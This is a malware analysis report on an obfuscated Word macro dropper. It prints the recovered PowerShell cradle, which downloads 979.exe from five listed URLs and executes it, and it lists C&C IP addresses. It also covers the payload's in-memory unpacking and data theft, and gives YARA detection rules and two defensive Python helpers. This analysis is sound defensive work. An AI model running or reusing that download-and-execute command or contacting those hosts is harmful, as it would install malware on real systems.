1. File info
File name: FILE-025909.doc
MD5: 7beeda071116da212aa8d3ffc4631516
Size: 275,584 Bytes
2. Analysis Environment
Operating System: Windows 7, 32-bit
Analysis Tools: IDA, Immunity Debugger, OllyDbg, Exeinfo PE, SysTracer, Process Explorer,
VBA Debugger (Office), OfficeMalScanner
3. Analysis Result
Scanning the specimen with OfficeMalScanner finds three VBA macro streams embedded in the document.
After dumping the macros, it is clear that they are obfuscated.
The VBA debugger in Office is used to step through the macro code. During debugging, we recover
the string that the macro passes to the shell, shown below.
This shell command runs the following PowerShell script (recovered as a single command line):
powershell $Tmz=new-object Net.WebClient;$qYd='http://hockeystickz.com/XE6LOJ@http://jeffweeksphotography.com/7mHSXX@http://hellcatshockey.org/k@http://gsverwelius.nl/7Sf68C7x@http://aile.pub/KmKEymIK'.Split('@');$qtJ = '979';$ITK=$env:public+'\'+$qtJ+'.exe';foreach($Puq in $qYd){try{$Tmz.DownloadFile($Puq, $ITK);Invoke-Item $ITK;break;}catch{}}
Its purpose is to download an executable to %PUBLIC%\979.exe and run it. The script walks the
'@'-separated URL list in order, and the first download that succeeds is executed with Invoke-Item
before the loop breaks; failures are silently swallowed by the empty catch block, so the remaining URLs
act as fallbacks.
Payload download URLs embedded in the document (the "C&C" of the document stage):
http://hockeystickz.com/XE6LOJ
http://jeffweeksphotography.com/7mHSXX
http://hellcatshockey.org/k
http://gsverwelius.nl/7Sf68C7x
http://aile.pub/KmKEymIK
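The following is an added example, not part of the original report: a small Python parser for this style of PowerShell download cradle. It rebuilds the cradle's variable table, splits the URL list on the delimiter given to .Split(), evaluates the string concatenation that forms the drop path (leaving $env: variables as %NAME% placeholders since it runs offline), and reports whether the payload is launched. The CRADLE string is the command recovered above, re-joined onto one line; the regular expressions and function names are this example's own assumptions about the cradle's shape, not anything from the report.

```python
import re

# Constructed sample: the download cradle recovered from the macro in this report,
# re-joined into a single command line (the '\\' below is one backslash).
CRADLE = (
    "powershell $Tmz=new-object Net.WebClient;"
    "$qYd='http://hockeystickz.com/XE6LOJ@http://jeffweeksphotography.com/7mHSXX"
    "@http://hellcatshockey.org/k@http://gsverwelius.nl/7Sf68C7x@http://aile.pub/KmKEymIK'"
    ".Split('@');$qtJ = '979';$ITK=$env:public+'\\'+$qtJ+'.exe';"
    "foreach($Puq in $qYd){try{$Tmz.DownloadFile($Puq, $ITK);Invoke-Item $ITK;break;}catch{}}"
)

# Assumed cradle grammar: "$name = rhs;" assignments, a 'list'.Split('sep') call,
# a foreach over the list variable and a WebClient.DownloadFile(url, dest) call.
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*([^;]+);")
SPLIT_RE = re.compile(r"^'([^']*)'\.Split\('([^']+)'\)$")
TERM_RE = re.compile(r"\$env:(\w+)|\$(\w+)|'([^']*)'")
LOOP_RE = re.compile(r"foreach\s*\(\s*\$\w+\s+in\s+\$(\w+)\s*\)")
DOWNLOAD_RE = re.compile(r"\.DownloadFile\(\s*\$\w+\s*,\s*\$(\w+)\s*\)")


def eval_concat(expr, variables):
    """Evaluate a PowerShell concatenation of 'literal', $var and $env:NAME terms.

    Environment variables are kept as %NAME% placeholders because we never touch
    the analysis host's environment. Literals containing '+' are not supported.
    """
    parts = []
    for term in (t.strip() for t in expr.split("+")):
        m = TERM_RE.fullmatch(term)
        if not m:
            raise ValueError("unsupported term: %r" % term)
        env_name, var_name, literal = m.groups()
        if env_name is not None:
            parts.append("%%%s%%" % env_name.upper())
        elif var_name is not None:
            parts.append(str(variables[var_name]))
        else:
            parts.append(literal)
    return "".join(parts)


def parse_cradle(cmd):
    """Return the URL list, the drop path and whether the downloaded file is launched."""
    variables = {}
    for name, rhs in ASSIGN_RE.findall(cmd):
        rhs = rhs.strip()
        m = SPLIT_RE.match(rhs)
        if m:
            variables[name] = m.group(1).split(m.group(2))
        elif rhs.lower().startswith("new-object"):
            variables[name] = rhs  # object construction; keep the text only
        else:
            variables[name] = eval_concat(rhs, variables)
    list_var = LOOP_RE.search(cmd).group(1)
    dest_var = DOWNLOAD_RE.search(cmd).group(1)
    return {
        "urls": variables[list_var],
        "drop_path": variables[dest_var],
        "executes": "Invoke-Item" in cmd or "Start-Process" in cmd,
    }


if __name__ == "__main__":
    info = parse_cradle(CRADLE)
    for url in info["urls"]:
        print("download:", url)
    print("drops to:", info["drop_path"], "| runs payload:", info["executes"])
```

Feeding the recovered command through parse_cradle yields the five URLs listed above, the drop path %PUBLIC%\979.exe and executes=True, which is the same conclusion reached by hand. The variable-table approach also survives renamed variables and a different split delimiter, which is what changes most often between samples of this macro family.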
Analysis of the executable "979.exe"
File info
MD5: 8d79ee8da119c2856f3fbaef9b8fa938
Size: 472,064 Bytes
Stepping through the specimen in a debugger shows that it uses self-modifying code to hinder analysis.
The malware decrypts a large block of bytes into its own address space: it copies the bytes into memory,
then decrypts and patches them in place.
The final result is a data block laid out like a PE file.
The malware then writes this data over its own image as loaded in memory. The main code runs from
this decrypted, overwritten region, so the on-disk file never contains the real payload in clear form.
The figure below shows the difference in the malware image before and after the executable code in
memory is overwritten.
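When a sample decrypts a PE-like block and writes it over its own image, the practical next step is to carve that image out of a process memory dump (or out of the decrypted buffer dumped from the debugger) so it can be loaded in IDA on its own. The following is an added example, not code from the original report: a Python scanner that walks every "MZ" in a buffer and only reports a hit when the full MZ -> e_lfanew -> "PE\0\0" chain and the optional-header magic check out, which keeps random "MZ" byte pairs in encrypted data from producing false positives. The SAMPLE_DUMP buffer and the PE32 header inside it are constructed for the example; they are not bytes from 979.exe.

```python
import struct


def find_embedded_pe(buf):
    """Scan a byte buffer (memory dump, decrypted blob) for embedded PE images.

    A hit requires the complete MZ -> e_lfanew -> 'PE\\0\\0' chain plus a valid
    optional-header magic, so stray 'MZ' bytes inside ciphertext are ignored.
    """
    hits = []
    pos = buf.find(b"MZ")
    while pos != -1:
        hit = _parse_pe_at(buf, pos)
        if hit:
            hits.append(hit)
        pos = buf.find(b"MZ", pos + 1)
    return hits


def _parse_pe_at(buf, pos):
    if pos + 0x40 > len(buf):
        return None
    e_lfanew = struct.unpack_from("<I", buf, pos + 0x3C)[0]
    pe = pos + e_lfanew
    # e_lfanew is small in real images; the 20-byte file header and the first 0x60
    # bytes of the optional header (up to SizeOfImage for PE32 and PE32+) must fit.
    if not (0x40 <= e_lfanew <= 0x400) or pe + 24 + 0x60 > len(buf):
        return None
    if buf[pe:pe + 4] != b"PE\0\0":
        return None
    machine, nsections = struct.unpack_from("<HH", buf, pe + 4)
    opt = pe + 24  # optional header follows the 4-byte signature and 20-byte file header
    magic = struct.unpack_from("<H", buf, opt)[0]
    if magic == 0x10B:    # PE32: ImageBase is a DWORD at +28
        image_base = struct.unpack_from("<I", buf, opt + 28)[0]
    elif magic == 0x20B:  # PE32+: ImageBase is a QWORD at +24
        image_base = struct.unpack_from("<Q", buf, opt + 24)[0]
    else:
        return None
    entry = struct.unpack_from("<I", buf, opt + 16)[0]
    size_of_image = struct.unpack_from("<I", buf, opt + 56)[0]
    return {
        "offset": pos,
        "machine": machine,
        "sections": nsections,
        "entry_point": entry,
        "image_base": image_base,
        "size_of_image": size_of_image,
    }


def build_sample_image():
    """Constructed minimal PE32 header (not a real sample) used to exercise the scanner."""
    img = bytearray(0x100)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)          # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HH", img, 0x44, 0x14C, 3)     # Machine = i386, 3 sections
    struct.pack_into("<H", img, 0x44 + 16, 0xE0)     # SizeOfOptionalHeader
    opt = 0x40 + 24
    struct.pack_into("<H", img, opt, 0x10B)          # PE32 magic
    struct.pack_into("<I", img, opt + 16, 0x1000)    # AddressOfEntryPoint
    struct.pack_into("<I", img, opt + 28, 0x400000)  # ImageBase
    struct.pack_into("<I", img, opt + 56, 0x7000)    # SizeOfImage
    return bytes(img)


# Constructed "dump": a decoy 'MZ' with no valid header chain, then the image.
SAMPLE_DUMP = b"\x00" * 0x10 + b"MZ" + bytes(range(0x30)) + build_sample_image() + b"\xff" * 0x10


if __name__ == "__main__":
    for h in find_embedded_pe(SAMPLE_DUMP):
        print("PE at 0x%x: machine=0x%x sections=%d entry=0x%x base=0x%x size=0x%x" % (
            h["offset"], h["machine"], h["sections"], h["entry_point"],
            h["image_base"], h["size_of_image"]))
```

On a real dump, SizeOfImage tells you how many bytes to cut starting at the reported offset, and ImageBase versus the address the region was actually mapped at tells you whether relocations were applied before the overwrite, which matters when you later load the carved image in IDA.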
Let's analyze the code running in memory.
The malware creates a new process named "979.exe".
After copying itself, the malware spawns a process, and that process in turn spawns another process
with the same name; this is the same behaviour observed for the "979.exe" file on disk.
The malware collects the computer name, the list of running processes and other host data. This data
is encoded and then encrypted with the CryptEncrypt API function.
In the next step, the malware Base64-encodes the encrypted data before sending it.
C&C servers:
207.255.226.104:50000
67.77.66.132:80
24.37.133.84:80
84.133.37.24:80
207.134.189.64:50000
68.42.248.45:8090
189.225.87.179:8443
41.33.127.215:8080
98.127.32.145:80
98.10.198.137:80
81.7.10.106:7080
198.0.227.57:7080
Persistence
The malware creates a registry key so that it is started automatically whenever the victim's system
boots or restarts.
4. Yara rule
rule malwareDropper
{
    strings:
        $mz = "MZ"   // DOS header magic of the PE file
        // Decryption routine observed in the self-modifying stage
        $func_dec = {83 C4 0C BF A2 0F 41 00 8D 6B F1 66 8B 35 F8 85 44 00 83 FB
                     07 73 01 4B 83 FD 10 73 01 4D 0F B7 C6 85 FF 74 63 3D 90 9B 09 00 75 0C E8 6F 96
                     01 00 66 8B 35 F8 85 44 00 A1 34 91 45 00 BA 38 00 00 00 8B 08 8D 40 04 81 C1 C0
                     6A 5F 01 89 48 FC 89 0D 40 91 45 00 4A 75 E9 33 C0 4F 66 85 F6 0F 94 C0 66 A3 D4
                     85 44 00 8B 44 24 10 83 F8 01 73 05 48 89 44 24 10 81 FF 0C 01 00 00 77 94 6A 29}
        // Start of the encrypted data block that is decrypted and written over the image
        $data_en = {01 F3 F5 C6 2C 5E 85 70 80 32 9D CA 0D 76 CE 2E 94 AB 27 AC
                    39 89 A6 6F 80 BB 97 A1 5B BC 6B 00 03 19 A1 E4 8A BB 98 D6 81 0C 5F 3A 83 BB 74
                    A0 90 72 5E 3A 88 14 84 59 39 37 9D 6F 6B B9 E9 D8 30 F9 49 B5 02 FC 07 01 BC 3F
                    F8 F3 CD A1 B3 50 B4 D5 DE 07 FA C3 AE 15 17 DF 9B C6 C3 74 06 FD C1 36 38 A1
                    AA 7B 52 98 A5 3A C2 1E 8C B6 26 F3 A3 84 3F 72 18 25 4A F0 C0 C3 C7 6F AF 44
                    A7 6F C5 B4 9F 0F 12 23 D3 77 CB D5 AB 91 FD F5 55 98}
        // Routine that builds the C&C IP address from the decrypted data
        $gen_ip = {E8 C9 B7 FF FF 83 C4 04 85 C0 0F 84 FD 00 00 00 68 FA 8F C0 1D
                   BA 54 00 00 00 B9 40 05 41 00 E8 BA B0 FF FF 8B 4F 14 83 C4 04 8B F0 0F B6 01 50
                   0F B6 41 01 50 0F B6 41 02 50 0F B6 41 03 50 56 8D 85 50 FF FF FF 6A 40 50 FF 15
                   6C 35 41 00 83 C4 1C 8B CE E8 25 B1 FF FF 8B 4D FC B8 AB AA AA AA}
    condition:
        $mz at 0 and ($func_dec or $data_en or $gen_ip)
}
rule malwareOffice
{
    strings:
        $header = {D0 CF 11 E0 A1 B1 1A E1}   // OLE2 compound file header (Office 97-2003 .doc)
        // "Shell" followed, after an unbounded gap, by "msoBarTypeNormal"
        $shell_execute = {53 68 65 6C 6C [-] 6D 73 6F 42 61 72 54 79 70 65 4E 6F 72 6D 61 6C}
    condition:
        $header at 0 and $shell_execute
}
5. Conclusion
The document is an obfuscated downloader. The dropped payload (979.exe) steals information from the
victim's computer after infection. It modifies itself in memory to hinder analysis: it decrypts a block of
data, overwrites its own executable code in memory with it, and then runs its main code from the
decrypted region.